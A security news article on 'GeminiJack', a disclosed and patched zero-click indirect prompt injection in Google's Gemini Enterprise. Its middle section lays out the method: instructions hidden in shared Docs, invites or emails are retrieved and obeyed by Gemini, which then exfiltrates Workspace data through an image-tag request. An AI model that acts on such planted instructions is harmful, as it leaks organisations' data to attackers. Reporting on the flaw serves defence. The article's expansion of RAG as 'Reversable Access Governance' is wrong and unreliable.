**GeminiJack Zero-Click Flaw Exposed Corporate Data**

A devastating zero-click flaw, dubbed GeminiJack, was discovered in Google's Gemini Enterprise platform, allowing attackers to exfiltrate sensitive corporate data without any warning signs or user interaction. This vulnerability highlights the growing threat of AI-native attacks and underscores the need for enhanced security measures.

**How it Works: A Simple yet Sinister Attack**

GeminiJack exploited a weakness in the RAG (Reversable Access Governance) system, which integrates generative AI capabilities into Google's productivity tools like Gmail, Calendar, Docs, and other Workspace apps. The attackers embedded hidden instructions in shared documents, calendar invitations, or emails, making it possible to access and extract corporate data without any user clicks.

The attack process can be broken down as follows:

1. **Indirect Prompt Injection**: Attackers plant hidden commands within accessible content such as Google Docs, Calendar invites, or Gmail subjects. 2. **Retrieval of Poisoned Content**: When an employee performs a normal search (e.g., "find all documents with Sales"), the RAG system retrieves the poisoned content and feeds it to Gemini. 3. **Execution of Instructions**: Gemini interprets the embedded instructions as legitimate, performing broad searches across connected Workspace data and exfiltrating results by embedding them in an image tag that sends an HTTP request to the attacker's server.

**The AI-powered Attack: A New Class of Vulnerabilities**

GeminiJack reveals a disturbing trend – AI tools accessing Gmail, Docs, and Calendar create a new attack surface. By manipulating the AI, attackers can compromise data, signifying a rising class of AI-native vulnerabilities. This flaw has demonstrated that even AI systems designed to enhance productivity and efficiency can be exploited for malicious purposes.

**Google's Quick Fix: A Beacon of Hope**

The researchers discovered the vulnerability on May 6th, 2025, and reported it to the Google Security Team. In collaboration with the researchers, Google quickly addressed the issue by fixing the RAG pipeline flaw that allowed malicious content to be misinterpreted as instructions. This swift response highlights the importance of proactive security measures in mitigating AI-powered attacks.

**The Implications: A Call to Action**

GeminiJack serves as a stark reminder of the evolving security landscape as AI systems become deeply integrated with organizational data. While Google has addressed this specific issue, the broader category of indirect prompt injection attacks against RAG systems requires continued attention from the security community.

In conclusion, GeminiJack has exposed a fundamental shift in how we must think about enterprise security. As AI-powered tools become increasingly prevalent, it is essential to adapt our security strategies to address these new vulnerabilities and ensure that AI systems do not become backdoors for malicious actors.

**Follow us on:**

* Twitter: @[securityaffairs](https://twitter.com/securityaffairs) * Facebook * Mastodon